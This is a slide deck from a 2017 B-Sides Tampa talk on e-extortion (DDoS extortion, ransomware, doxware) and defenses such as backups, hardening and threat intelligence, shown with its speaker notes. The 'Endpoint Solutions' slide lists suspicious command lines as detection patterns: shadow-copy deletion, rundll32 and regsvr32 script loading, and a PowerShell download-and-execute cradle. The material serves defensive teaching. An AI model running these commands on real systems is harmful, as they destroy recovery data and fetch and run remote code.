Erik Iker, profile picture
Uploaded byErik Iker
PPTX, PDF950 views

e-Extortion Trends and Defense

This document summarizes an presentation on e-extortion trends and defense. It discusses the evolution of extortion from early distributed denial of service attacks and ransomware to more sophisticated techniques that combine encryption, data exfiltration, and extortion demands. The presentation outlines strategies for defending against these threats, including backups, system hardening, endpoint security solutions, threat intelligence sharing, and following financial trails.

Technology
Related topics:
Cyber-Security

Embed presentation

Download to read offline
Erik Iker Sr. Incident Response Analyst B-Sides Tampa 2017 e-Extortion Trends & Defense
Cisco Confidential 2 Whoami • Incident Response Analyst for Cisco Security Advisory Services. Working with customers performing strategic, proactive, and reactive response to information security issues • 3 years – Insider threat analyst then Intrusion Forensics and Hunt Team manager at JPMorgan Chase • 13 years law enforcement performing digital forensics and computer crime investigations
Cisco Confidential 3 Agenda Evolution of extortion and trends Ransomware Defense DDoS & Threat Intel
Cisco Confidential 4 Extortion Defined The practice of obtaining something, especially money, through force or threats
Cisco Confidential 5 Attribution was simpler
Cisco Confidential 6 First forays into e-extortion • 2007 FBI release of warning about online extortion mirroring mafia tactics
Cisco Confidential 7 DDoS “Protection” Racket
Cisco Confidential 8 Armada Collective DHS Warning
Cisco Confidential 9 Lizard Squad Gaming DDoS
Cisco Confidential 10 Cats Catch Some Mice Again • Early 2016 Interpol coordinated arrests of Armada Collective Members in Australia, and DD4BC members in Bosnia and Herzegovinia
Cisco Confidential 11 Copy Cat Profiteering
Cisco Confidential 12 Ransom Extends Extortion • Ransom: Payment demanded for the release of a captured person or property
Cisco Confidential 13 Data Breach Response Phishing • Scammers leveraged breaches of adult-themed websites to scare victims into ransom payments
Cisco Confidential 14 Data Breached for Ransom
Cisco Confidential 15 Ransomware Scams That Can’t Decrypt http://www.welivesecurity.com/2017/01/05/killdisk- now-targeting-linux-demands-250k-ransom-cant- decrypt/ http://blog.talosintel.com/2016/07/ranscam.html
Cisco Confidential 16 Ransom Hits Home • Publicly accessible NoSQL, Elasticsearch, Hadoop, Redis being deleted with ransom note left. • Completely unable to be recovered, EVEN IF YOU PAY
Cisco Confidential 17 The Gift That Keeps Giving • In January, Cisco Talos researchers found new variants of Locky also deliver Kovter click fraud Trojan • http://blog.talosintel.com/2017/01/locky-struggles.html
Cisco Confidential 18 E-Extortion Trifecta • Doxware brings all the extortion tactics into one, and is becoming more mainstream: • Encryption • Exfiltration • Extortion demands • Public Data Leak
Cisco Confidential 19 What We Know So Far • History Repeats itself with the cat-and-mouse game, and innovation of the mice – We have to be ready for the next evolution of threats • Getting to know your enemy can keep you from paying out to imposters – We need to gain intelligence about our threats • Even if you pay your enemy, what keeps them from coming back again and again wanting more handouts? – Let’s be prepared to defend ourselves and maintain business continuity plans
Cisco Confidential 20 Ransom? • “Without a hostage, there is no ransom. That’s what a ransom is.” - The rules according to Walter Sobchak
Cisco Confidential 21 Backups – Offline if Possible • CryptoFortress – encrypting unmapped shares • SamSam – Criminal group obtaining foothold through LFI, conducting surveillance, then encrypting everything including backup servers
Cisco Confidential 22 System Hardening • Over 90% of PowerShell scripts analyzed by Symantec were malicious in 2016. If endpoints don’t need PS, remove it • If you can’t remove PS, disable ISE and REPL ability • Application whitelisting • Change default network options for NoSQL • bind 127.0.0.1 instead of 0.0.0.0 • Change default ports to custom config to stifle script kiddies • https://www.elastic.co/blog/protecting-against-attacks-that-hold-your-data-for- ransom • Restrict IP ranges that can access your NoSQL Instance • Implement security group for cloud instances • http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html
Cisco Confidential 23 Endpoint Solutions • Able to review for heuristic patterns of binaries being called, and review command line parameters such as: • “Vssadmin.exe delete shadows /all /quiet del /f /q %0” • “rundll32.exe C:Users$usernameAppDataLocalTemp” • “rundll32.exe javascript:”mshtml,RunHTMLApplication<script execution stuff>.RegRead(”HKCU<specific registry path>”) “ will interpret in the command line as “rundll.exe mshtml.dll, $hexadecimal for entry point in memory” • “regsvr32.exe /s /u /i:< ^((http[s]?|ftp):/)?/?([^:/s]+)((/w+)*/)([w- .]+[^#?s]+)(.*)?(#[w-]+)?$ > scrobj.dll • “Powershell -nop -c "iex(New-Object Net.WebClient).DownloadString : “^((http[s]?|ftp):/)?/?([^:/s]+)((/w+)*/)([w-.]+[^#?s]+)(.*)?(#[w-]+)?$ ’)" • “Maliciousbinary.exe %windir%system32....%smstc.exe”
Cisco Confidential 24 Ransomware Decryptors • https://www.nomoreransom.org/ • http://www.talosintelligence.com/teslacrypt_tool/
Cisco Confidential 25 What About Things That Aren’t Ransomware? neeson_speech1
Cisco Confidential 26 One DDoS Does Not Fit All • Volume Based Attacks – Goal is to overload bandwidth – UDP flood, ICMP floods (Bits per second) • Protocol Attacks – goal is to overload router, firewall, and GLB – fragmented packets, Smurf Attack (spoof victim IP for requests reflected at victim) (Packets per second) • Application Attacks – goal is to overload the resources of the web server – flood of GET or POST requests – Slowloris - creating connections with only partial requests to leave connection open (requests per second)
Cisco Confidential 27 Mirai • Internet of Terribly Secured Things opened the door to the most geographically dispersed botnets for DDoS • Mirai takes over device and shuts off Telnet, SSH, and HTTP ports so remote access isn’t possible for remediation • Baby Monitors and CCTV cameras responsible for high profile attacks • Using dictionary of ~60 weak passwords (less than the Morris
Cisco Confidential 28 DDoSaaS
Cisco Confidential 29 DDoS Game Plan • Be able to detect DDoS before network is inaccessible, or systems are crashing using NetFlow, system resource, and Firewall traffic monitoring dashboards • Have a plan for blocking, dropping, scrubbing, rate limiting traffic using local appliances or a vendor relationship • Do not rely solely on an agreement with ISP as your plan for DDoS mitigation
Cisco Confidential 30 Start with Google
Cisco Confidential 31 Follow the Money
Cisco Confidential 32 Intel Feeds and Community Membership • ISACs o msisac.cisecurity.org o fsisac.com o r-cisc.org • Malware sharing - www.misp-project.org • MITRE Threat Intel Project - https://crits.github.io/ • Tons of paid vendor feeds
Cisco Confidential 33 Use Your Phishing Quarantine Data
Cisco Confidential 34 Thanks • Twitter - @ErikIkerFW • LinkedIn - www.linkedin.com/in/erikiker

More Related Content

PDF
Capture the Flag Exercise Using Active Deception Defense
byFidelis Cybersecurity
 
PPTX
Become a Threat Hunter by Hamza Beghal
byNull Singapore
 
PDF
Fidelis - Live Demonstration of Deception Solution
byFidelis Cybersecurity
 
PDF
Shamoon
byShakacon
 
PDF
Webinar: Hunting maturity through cyber deception
byCymmetria
 
PDF
Hunting and Legal Hackback using Cyber Deception
byCymmetria
 
PDF
"Giving the bad guys no sleep"
byChristiaan Beek
 
PDF
Offensive malware usage and defense
byChristiaan Beek
 
Capture the Flag Exercise Using Active Deception Defense
byFidelis Cybersecurity
 
Become a Threat Hunter by Hamza Beghal
byNull Singapore
 
Fidelis - Live Demonstration of Deception Solution
byFidelis Cybersecurity
 
Shamoon
byShakacon
 
Webinar: Hunting maturity through cyber deception
byCymmetria
 
Hunting and Legal Hackback using Cyber Deception
byCymmetria
 
"Giving the bad guys no sleep"
byChristiaan Beek
 
Offensive malware usage and defense
byChristiaan Beek
 

What's hot

PDF
Wannacry | Technical Insight and Lessons Learned
byThomas Roccia
 
PPTX
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
byJack Shaffer
 
PDF
CSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
byNCCOMMS
 
PDF
Atelier Technique ARBOR NETWORKS ACSS 2018
byAfrican Cyber Security Summit
 
PPTX
WannaCry ransomware outbreak - what you need to know
bySymantec Security Response
 
PDF
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
byPROIDEA
 
PPTX
Breaking the cyber kill chain!
byNahidul Kibria
 
PDF
How to protect your business from Wannacry Ransomware
byKaspersky
 
PDF
Behavior-Based Defense in ICS
byDragos, Inc.
 
PDF
Adaptive Defense - Understanding Cyber Attacks
byJermund Ottermo
 
PPTX
Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure
byShakacon
 
PPTX
Cymmetria Webinar: Deception & Responder
byCymmetria
 
PDF
Atelier Technique CISCO ACSS 2018
byAfrican Cyber Security Summit
 
PDF
Webinar: Stopping evasive malware - how a cloud sandbox array works
byCyren, Inc
 
PDF
The 4horsemen of ics secapocalypse
byChristiaan Beek
 
PPTX
"There's a pot of Bitcoins behind the ransomware rainbow"
byChristiaan Beek
 
PPTX
Defending Against 1,000,000 Cyber Attacks by Michael Banks
byEC-Council
 
PDF
CSF18 - Incident Response in the Cloud - Yuri Diogenes
byNCCOMMS
 
PDF
CSF18 - Guarding Against the Unknown - Rafael Narezzi
byNCCOMMS
 
PPTX
Ransomware 2017: New threats emerge
bySymantec Security Response
 
Wannacry | Technical Insight and Lessons Learned
byThomas Roccia
 
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
byJack Shaffer
 
CSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
byNCCOMMS
 
Atelier Technique ARBOR NETWORKS ACSS 2018
byAfrican Cyber Security Summit
 
WannaCry ransomware outbreak - what you need to know
bySymantec Security Response
 
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
byPROIDEA
 
Breaking the cyber kill chain!
byNahidul Kibria
 
How to protect your business from Wannacry Ransomware
byKaspersky
 
Behavior-Based Defense in ICS
byDragos, Inc.
 
Adaptive Defense - Understanding Cyber Attacks
byJermund Ottermo
 
Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure
byShakacon
 
Cymmetria Webinar: Deception & Responder
byCymmetria
 
Atelier Technique CISCO ACSS 2018
byAfrican Cyber Security Summit
 
Webinar: Stopping evasive malware - how a cloud sandbox array works
byCyren, Inc
 
The 4horsemen of ics secapocalypse
byChristiaan Beek
 
"There's a pot of Bitcoins behind the ransomware rainbow"
byChristiaan Beek
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
byEC-Council
 
CSF18 - Incident Response in the Cloud - Yuri Diogenes
byNCCOMMS
 
CSF18 - Guarding Against the Unknown - Rafael Narezzi
byNCCOMMS
 
Ransomware 2017: New threats emerge
bySymantec Security Response
 

Viewers also liked

PPTX
Incident Response in the wake of Dear CEO
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PDF
Regex Considered Harmful: Use Rosie Pattern Language Instead
byAll Things Open
 
PDF
Nuvola: a tale of migration to AWS
byMatteo Moretti
 
PDF
Business quiz
byvarsha nihanth lade
 
PDF
Cloud Foundry Logging and Metrics
byEd King
 
PPTX
EVOLVE'16 | Enhance | Anil Kalbag & Anshul Chhabra | Comparative Architecture...
byEvolve The Adobe Digital Marketing Community
 
PPT
Java Garbage Collectors – Moving to Java7 Garbage First (G1) Collector
byGurpreet Sachdeva
 
PPTX
Watering hole attacks case study analysis
byCysinfo Cyber Security Community
 
PDF
How to build a Distributed Serverless Polyglot Microservices IoT Platform us...
byAnimesh Singh
 
PDF
AppSphere 15 - Containers and Microservices Create New Performance Challenges
byAppDynamics
 
PPTX
How to: node js & micro-services
byMichael Haberman
 
PPTX
LJC Mashup "Building Java Microservices for the Cloud && Chuck Norris Doesn't...
byDaniel Bryant
 
PDF
How Docker EE is Finnish Railway’s Ticket to App Modernization
byDocker, Inc.
 
PPTX
Serverless Logging with AWS Lambda and the Elastic Stack
byEdoardo Paolo Scalafiotti
 
PPTX
Failing at Scale - PNWPHP 2016
byChris Tankersley
 
PDF
AtlasCamp 2015: How HipChat ships at the speed of awesome
byAtlassian
 
PDF
Urban Legends: What You Code Makes You Who You Are - PJ Hagerty - Codemotion ...
byCodemotion
 
PPTX
Teaching for Peace, Renewing the Spirit - TESOL 2014
byCheryl Woelk
 
PPT
Een Gezond Gebit2
byguest031320
 
PPTX
Plumbing tips
byElk Mariposa
 
Incident Response in the wake of Dear CEO
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Regex Considered Harmful: Use Rosie Pattern Language Instead
byAll Things Open
 
Nuvola: a tale of migration to AWS
byMatteo Moretti
 
Business quiz
byvarsha nihanth lade
 
Cloud Foundry Logging and Metrics
byEd King
 
EVOLVE'16 | Enhance | Anil Kalbag & Anshul Chhabra | Comparative Architecture...
byEvolve The Adobe Digital Marketing Community
 
Java Garbage Collectors – Moving to Java7 Garbage First (G1) Collector
byGurpreet Sachdeva
 
Watering hole attacks case study analysis
byCysinfo Cyber Security Community
 
How to build a Distributed Serverless Polyglot Microservices IoT Platform us...
byAnimesh Singh
 
AppSphere 15 - Containers and Microservices Create New Performance Challenges
byAppDynamics
 
How to: node js & micro-services
byMichael Haberman
 
LJC Mashup "Building Java Microservices for the Cloud && Chuck Norris Doesn't...
byDaniel Bryant
 
How Docker EE is Finnish Railway’s Ticket to App Modernization
byDocker, Inc.
 
Serverless Logging with AWS Lambda and the Elastic Stack
byEdoardo Paolo Scalafiotti
 
Failing at Scale - PNWPHP 2016
byChris Tankersley
 
AtlasCamp 2015: How HipChat ships at the speed of awesome
byAtlassian
 
Urban Legends: What You Code Makes You Who You Are - PJ Hagerty - Codemotion ...
byCodemotion
 
Teaching for Peace, Renewing the Spirit - TESOL 2014
byCheryl Woelk
 
Een Gezond Gebit2
byguest031320
 
Plumbing tips
byElk Mariposa
 

Similar to e-Extortion Trends and Defense

PDF
Cisco Cyber Security Essentials Chapter-1
byMukesh Chinta
 
PPTX
IntroCyberv2.1_Chp2_Instructor_Supplemental_Material.pptx
byfuebf
 
PPTX
1- Cybersecurity Threats, Vulnerabilities, and Attacks.pptx
bytarunprog01
 
PPTX
CA_Module_1.pptx
byYazanSalileh
 
PDF
Anatomy of an Attack
byCisco Canada
 
PDF
Anatomy Of An Attack
byCisco Canada
 
PDF
Need for cybersecurity
bySri Manakula Vinayagar Engineering College
 
PDF
CA_Module_1.pdf
byEhabRushdy1
 
PPT
ITE v5.0 - Chapter 10
byIrsandi Hasan
 
PDF
Cisco Connect Toronto 2017 - Security Through The Eyes of a Hacker
byCisco Canada
 
PDF
Compliance made easy. Pass your audits stress-free.
byAlgoSec
 
PDF
CONFidence2015: Real World Threat Hunting - Martin Nystrom
byPROIDEA
 
PPT
Lec21 security
bysureshfsp
 
PPT
Network security
byShaikh Muhammed
 
PPT
Lec21 security
byNarayan Suthar
 
PPTX
Two for Attack: Web and Email Content Protection
byCisco Canada
 
PPTX
Do it Best Corp. Techapalooza 2013 Presentation
byBrian T. O'Hara CISA, CISM, CRISC, CCSP, CISSP
 
PDF
Cisco connect winnipeg 2018 anatomy of an attack
byCisco Canada
 
PDF
Recognizing security threats
byKishore Kumar
 
PPTX
CSE_Instructor_Materials_Chapter7.pptx
byMohammad512578
 
Cisco Cyber Security Essentials Chapter-1
byMukesh Chinta
 
IntroCyberv2.1_Chp2_Instructor_Supplemental_Material.pptx
byfuebf
 
1- Cybersecurity Threats, Vulnerabilities, and Attacks.pptx
bytarunprog01
 
CA_Module_1.pptx
byYazanSalileh
 
Anatomy of an Attack
byCisco Canada
 
Anatomy Of An Attack
byCisco Canada
 
Need for cybersecurity
bySri Manakula Vinayagar Engineering College
 
CA_Module_1.pdf
byEhabRushdy1
 
ITE v5.0 - Chapter 10
byIrsandi Hasan
 
Cisco Connect Toronto 2017 - Security Through The Eyes of a Hacker
byCisco Canada
 
Compliance made easy. Pass your audits stress-free.
byAlgoSec
 
CONFidence2015: Real World Threat Hunting - Martin Nystrom
byPROIDEA
 
Lec21 security
bysureshfsp
 
Network security
byShaikh Muhammed
 
Lec21 security
byNarayan Suthar
 
Two for Attack: Web and Email Content Protection
byCisco Canada
 
Do it Best Corp. Techapalooza 2013 Presentation
byBrian T. O'Hara CISA, CISM, CRISC, CCSP, CISSP
 
Cisco connect winnipeg 2018 anatomy of an attack
byCisco Canada
 
Recognizing security threats
byKishore Kumar
 
CSE_Instructor_Materials_Chapter7.pptx
byMohammad512578
 

Recently uploaded

PPTX
Design Flaws and Known Attacks in Agentic AI - ITI Business Session
byInformation Technology Institute
 
PPTX
Full course that Prymehat uploads for you
byOhenebaManu1
 
PDF
UiPath Coded Agents - A Developer Driven Agentic Automation Era
byUiPathCommunity
 
PDF
Building Voice Agents with Google Agent Development Kit
bySuresh Peiris
 
PPTX
AI_in_Cybersecurity_Insights_Case_Studies.pptx
bywrksmith9
 
PDF
TrustArc Webinar - Unpacking India’s DPDP Act: What You Should Know
byTrustArc
 
PDF
6 Insights from the Patron Saint of AI Failure
byScott M. Graffius
 
PDF
Are AI Hallucinations Getting Better or Worse? We Analyzed the Data.
byScott M. Graffius
 
PPTX
Spacewalk 2026 - Presented at the IMAX in Raleigh, NC
byAll Things Open
 
PDF
A "Kill Switch" (Emergency Off Switch) for AI?
byScott M. Graffius
 
PDF
Top 10 Dedicated Server Providers in Stockholm (Updated Edition).pdf
byAtal Networks
 
PPTX
UNIT 1- Introduction to Basic of Computer Fundamentals
bypawarbhaktiit
 
PDF
2006 IEEE International Solid-State Circuits Conference
bySlide_N
 
PDF
KM World 2025 Enterprises, KM, & Agentic AI
byEnterprise Knowledge
 
PDF
Presentation on Four Stroke Engine of Ic engine
bySonam Sherpa
 
PDF
XonTel Plus IP-PBX Business Phone System
byXonTel Technology
 
PDF
Zniber Partners. Audience Foresight for Confident Decisions
bySamuel Zniber
 
PDF
Philippine Agricultural Engineering Standard_Hand Tractor .pdf
by6xfrnmdp4b
 
PDF
Hart, Inc. M&A Data Transition Checklist
byHart, Inc.
 
PDF
Purple Team - Active Directory and AzureAD v1
byVICTOR MAESTRE RAMIREZ
 
Design Flaws and Known Attacks in Agentic AI - ITI Business Session
byInformation Technology Institute
 
Full course that Prymehat uploads for you
byOhenebaManu1
 
UiPath Coded Agents - A Developer Driven Agentic Automation Era
byUiPathCommunity
 
Building Voice Agents with Google Agent Development Kit
bySuresh Peiris
 
AI_in_Cybersecurity_Insights_Case_Studies.pptx
bywrksmith9
 
TrustArc Webinar - Unpacking India’s DPDP Act: What You Should Know
byTrustArc
 
6 Insights from the Patron Saint of AI Failure
byScott M. Graffius
 
Are AI Hallucinations Getting Better or Worse? We Analyzed the Data.
byScott M. Graffius
 
Spacewalk 2026 - Presented at the IMAX in Raleigh, NC
byAll Things Open
 
A "Kill Switch" (Emergency Off Switch) for AI?
byScott M. Graffius
 
Top 10 Dedicated Server Providers in Stockholm (Updated Edition).pdf
byAtal Networks
 
UNIT 1- Introduction to Basic of Computer Fundamentals
bypawarbhaktiit
 
2006 IEEE International Solid-State Circuits Conference
bySlide_N
 
KM World 2025 Enterprises, KM, & Agentic AI
byEnterprise Knowledge
 
Presentation on Four Stroke Engine of Ic engine
bySonam Sherpa
 
XonTel Plus IP-PBX Business Phone System
byXonTel Technology
 
Zniber Partners. Audience Foresight for Confident Decisions
bySamuel Zniber
 
Philippine Agricultural Engineering Standard_Hand Tractor .pdf
by6xfrnmdp4b
 
Hart, Inc. M&A Data Transition Checklist
byHart, Inc.
 
Purple Team - Active Directory and AzureAD v1
byVICTOR MAESTRE RAMIREZ
 

e-Extortion Trends and Defense

  • 1.
    Erik Iker Sr. IncidentResponse Analyst B-Sides Tampa 2017 e-Extortion Trends & Defense
  • 2.
    Cisco Confidential 2 Whoami •Incident Response Analyst for Cisco Security Advisory Services. Working with customers performing strategic, proactive, and reactive response to information security issues • 3 years – Insider threat analyst then Intrusion Forensics and Hunt Team manager at JPMorgan Chase • 13 years law enforcement performing digital forensics and computer crime investigations
  • 3.
    Cisco Confidential 3 Agenda Evolutionof extortion and trends Ransomware Defense DDoS & Threat Intel
  • 4.
    Cisco Confidential 4 ExtortionDefined The practice of obtaining something, especially money, through force or threats
  • 5.
  • 6.
    Cisco Confidential 6 Firstforays into e-extortion • 2007 FBI release of warning about online extortion mirroring mafia tactics
  • 7.
    Cisco Confidential 7 DDoS“Protection” Racket
  • 8.
    Cisco Confidential 8 ArmadaCollective DHS Warning
  • 9.
    Cisco Confidential 9 LizardSquad Gaming DDoS
  • 10.
    Cisco Confidential 10 CatsCatch Some Mice Again • Early 2016 Interpol coordinated arrests of Armada Collective Members in Australia, and DD4BC members in Bosnia and Herzegovinia
  • 11.
  • 12.
    Cisco Confidential 12 RansomExtends Extortion • Ransom: Payment demanded for the release of a captured person or property
  • 13.
    Cisco Confidential 13 DataBreach Response Phishing • Scammers leveraged breaches of adult-themed websites to scare victims into ransom payments
  • 14.
    Cisco Confidential 14 DataBreached for Ransom
  • 15.
    Cisco Confidential 15 RansomwareScams That Can’t Decrypt http://www.welivesecurity.com/2017/01/05/killdisk- now-targeting-linux-demands-250k-ransom-cant- decrypt/ http://blog.talosintel.com/2016/07/ranscam.html
  • 16.
    Cisco Confidential 16 RansomHits Home • Publicly accessible NoSQL, Elasticsearch, Hadoop, Redis being deleted with ransom note left. • Completely unable to be recovered, EVEN IF YOU PAY
  • 17.
    Cisco Confidential 17 TheGift That Keeps Giving • In January, Cisco Talos researchers found new variants of Locky also deliver Kovter click fraud Trojan • http://blog.talosintel.com/2017/01/locky-struggles.html
  • 18.
    Cisco Confidential 18 E-ExtortionTrifecta • Doxware brings all the extortion tactics into one, and is becoming more mainstream: • Encryption • Exfiltration • Extortion demands • Public Data Leak
  • 19.
    Cisco Confidential 19 WhatWe Know So Far • History Repeats itself with the cat-and-mouse game, and innovation of the mice – We have to be ready for the next evolution of threats • Getting to know your enemy can keep you from paying out to imposters – We need to gain intelligence about our threats • Even if you pay your enemy, what keeps them from coming back again and again wanting more handouts? – Let’s be prepared to defend ourselves and maintain business continuity plans
  • 20.
    Cisco Confidential 20 Ransom? •“Without a hostage, there is no ransom. That’s what a ransom is.” - The rules according to Walter Sobchak
  • 21.
    Cisco Confidential 21 Backups– Offline if Possible • CryptoFortress – encrypting unmapped shares • SamSam – Criminal group obtaining foothold through LFI, conducting surveillance, then encrypting everything including backup servers
  • 22.
    Cisco Confidential 22 SystemHardening • Over 90% of PowerShell scripts analyzed by Symantec were malicious in 2016. If endpoints don’t need PS, remove it • If you can’t remove PS, disable ISE and REPL ability • Application whitelisting • Change default network options for NoSQL • bind 127.0.0.1 instead of 0.0.0.0 • Change default ports to custom config to stifle script kiddies • https://www.elastic.co/blog/protecting-against-attacks-that-hold-your-data-for- ransom • Restrict IP ranges that can access your NoSQL Instance • Implement security group for cloud instances • http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html
  • 23.
    Cisco Confidential 23 EndpointSolutions • Able to review for heuristic patterns of binaries being called, and review command line parameters such as: • “Vssadmin.exe delete shadows /all /quiet del /f /q %0” • “rundll32.exe C:Users$usernameAppDataLocalTemp” • “rundll32.exe javascript:”mshtml,RunHTMLApplication<script execution stuff>.RegRead(”HKCU<specific registry path>”) “ will interpret in the command line as “rundll.exe mshtml.dll, $hexadecimal for entry point in memory” • “regsvr32.exe /s /u /i:< ^((http[s]?|ftp):/)?/?([^:/s]+)((/w+)*/)([w- .]+[^#?s]+)(.*)?(#[w-]+)?$ > scrobj.dll • “Powershell -nop -c "iex(New-Object Net.WebClient).DownloadString : “^((http[s]?|ftp):/)?/?([^:/s]+)((/w+)*/)([w-.]+[^#?s]+)(.*)?(#[w-]+)?$ ’)" • “Maliciousbinary.exe %windir%system32....%smstc.exe”
  • 24.
    Cisco Confidential 24 RansomwareDecryptors • https://www.nomoreransom.org/ • http://www.talosintelligence.com/teslacrypt_tool/
  • 25.
    Cisco Confidential 25 WhatAbout Things That Aren’t Ransomware? neeson_speech1
  • 26.
    Cisco Confidential 26 OneDDoS Does Not Fit All • Volume Based Attacks – Goal is to overload bandwidth – UDP flood, ICMP floods (Bits per second) • Protocol Attacks – goal is to overload router, firewall, and GLB – fragmented packets, Smurf Attack (spoof victim IP for requests reflected at victim) (Packets per second) • Application Attacks – goal is to overload the resources of the web server – flood of GET or POST requests – Slowloris - creating connections with only partial requests to leave connection open (requests per second)
  • 27.
    Cisco Confidential 27 Mirai •Internet of Terribly Secured Things opened the door to the most geographically dispersed botnets for DDoS • Mirai takes over device and shuts off Telnet, SSH, and HTTP ports so remote access isn’t possible for remediation • Baby Monitors and CCTV cameras responsible for high profile attacks • Using dictionary of ~60 weak passwords (less than the Morris
  • 28.
  • 29.
    Cisco Confidential 29 DDoSGame Plan • Be able to detect DDoS before network is inaccessible, or systems are crashing using NetFlow, system resource, and Firewall traffic monitoring dashboards • Have a plan for blocking, dropping, scrubbing, rate limiting traffic using local appliances or a vendor relationship • Do not rely solely on an agreement with ISP as your plan for DDoS mitigation
  • 30.
  • 31.
  • 32.
    Cisco Confidential 32 IntelFeeds and Community Membership • ISACs o msisac.cisecurity.org o fsisac.com o r-cisc.org • Malware sharing - www.misp-project.org • MITRE Threat Intel Project - https://crits.github.io/ • Tons of paid vendor feeds
  • 33.
    Cisco Confidential 33 UseYour Phishing Quarantine Data
  • 34.
    Cisco Confidential 34 Thanks •Twitter - @ErikIkerFW • LinkedIn - www.linkedin.com/in/erikiker

Editor's Notes

  • #5 Extortion threats and vulnerabilities were easier to gauge in the prior to the beginnings of e-extortion
  • #6 Mafia-style extortion had some drawbacks, mainly due to easier attrition, and law enforcement action. Through the entire life of extortion, the cat and mouse evolution stays the same though
  • #7 As with all things, everything old is new again. This threat resurfaced in 2013 without much change, in the wording, but was at least leveraging new technology and asking for bitcoin payment with a link to a BTC address.
  • #9 History repeats itself in 2015 when the real armada collective causes harm to many email and financial institutions. The warning by DHS shows that there was a small DDoS attack, show of power, followed by an email demand for payment.
  • #10 Lizard Squad received much media attention for it’s DDoS attacks on gaming networks despite giving warning of the attacks ahead of time on Twitter They also chose to stop their Christmas, 2014 DDoS of the Xbox network after Kimdotcom agreed to pay them in megaupload vouchers so he could play Destiny
  • #12 After Armada Collective was arrested, this group sent phish emails to companies and cashed in without ever launching an attack. The MO of email before DDoS didn’t match what the real Armada Collective did, and it didn't’t take a costly Threat Intel feed to google the DHS alert to know how the real group operated differed. All it takes is an email address to collect money if you can capitalize on a famous name. In 2015 multiple companies paid up to Phishing emails after seeing what the mighty Sony and Microsoft networks couldn’t stop from Lizard Squad.
  • #14 Adult Friend Finder, Brazzers, Ashley Madison, Penthouse, YouPorn, Fur Affinity
  • #15 We are now seeing the combination of ransomware with other types of malware to keep attacks active after the payment of ransom. With high profile ransoms for breached data by certain actors, and the profitability of ransomware, why have these forces not combined Ransomware with information stealing malware, to exfiltrate encrypted files, and then sell the data online if ransom not paid, or even if it is.
  • #16 Ranscam differs from other ransomware families like Locky, Cryptolocker, Cerber etc, because even if you pay, they do not release your files. Definitely good to know if you will be paying for nothing. Will be interesting to see how this changes the underground economy of ransomware. Newer variant is Linux Killdisk. Demanding $250k
  • #17 Victor Gevers Sec Res. Started noting Mongo DB being deleted Dec 26, 2016. Expanded to others. Scriptable Actions, no recovery possible Sigaint email addresses are in multiple campaigns
  • #18 Even after files released on Locky payment, infection can remain
  • #19 Combining Pony credential stealing with ransomware. Becoming more prevalent since Oct 2016, reported on by https://www.scmagazine.com/researchers-spot-ransomware-with-abilities-to-leak-data-for-non-compliance/article/567622/
  • #21 Big Lebowski. Found Bunny Lebowski went home, and the Germans kept trying to get the ransom money. WTF Walter said. Those are the rules. Is he the only one who cares about the rules If we can keep ransomware from having any effect, then there is no ransom at all. Next slides discuss how.
  • #22 Offline backups need emphasized with new ransomware variant CryptoFortress discovered in March 2016 seeking SMB paths not even mapped. Samas targeting backup servers. Have you tried to recover from those backups and seen if you process and backup style/age is conducive to it Changes to PSEXEC key, terminal server key, PuTTY key
  • #23 Disable ports and services not needed Eliminate powershell if not needed Disable REPL or ISE if powershell needed Use VPS secure groups https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/
  • #24 Visibility to new MD5 on system, new services, scheduled jobs, registry key changes Putty, terminal services, psexec keys etc
  • #26 Application Whitelisting – alternatively limit executables to run only from certain paths Disable unneeded ports and services (HTTP etc) Defined roles on network shares with least privilege for user access Privileged Account Management If machines/shares are affected, is there a plan for continuity, to segment that machine, and route traffic around, or go to paper?
  • #27 Game plan for detecting DDoS before there are saturated links, or system resource issues. Types of DDoS, discuss early detection from Lancope, or other systems, having a plan for blocking, dropping, monitoring, scrubbing. In-network Appliances can mitigate application layer attacks – geo-blocking (50% of DDoS originating IP space in China), rate limiting, signatures of packets, Partnership with Radware, Arbor, Cloudflare. Don’t rely on ISP as the only play in your playbook
  • #28 Baby Monitors – DynDNS attack CCTV cameras – Krebs attack
  • #29 Lizard squad also innovated with DDoS as a Service where anyone with a bitcoin or two could lease their power to shut down any site they wanted. Recent Arrests of 3 in Israel who had profited $600,000 renting out DDoS infrastructure.
  • #30 Game plan for detecting DDoS before there are saturated links, or system resource issues. Types of DDoS, discuss early detection from Lancope, or other systems, having a plan for blocking, dropping, monitoring, scrubbing. In-network Appliances can mitigate application layer attacks – geo-blocking (50% of DDoS originating IP space in China), rate limiting, signatures of packets, Partnership with Radware, Arbor, Cloudflare. Don’t rely on ISP as the only play in your playbook
  • #31 To not be one of the statistics in the $100,000 paid in BTC to Armada Collective Imposters in 2016, or any amount to its peers, all a victim needed to do was look on Twitter or Google. Both perfectly good sources of Intel. A solid list of infosec leaders being followed on Twitter can be a great early warning system
  • #32 Following the money might not be for everyone, but law enforcement are now able to track transactions of Bitcoin and track them all the way to the wallets. These type tools are also increasingly being used by financial institutions who need to comply with KYC regulations if they want to take part in any blockchain transactions. It’s how we know that $209 million has been paid out to ransomware in Q1 and Q2 2016 You can see if others are paying to the wallet from your issue. If not, maybe it is targeted?
  • #33 Collage of Threat Intel Vendors, discussion of CIM, STIX, TAXI and integration
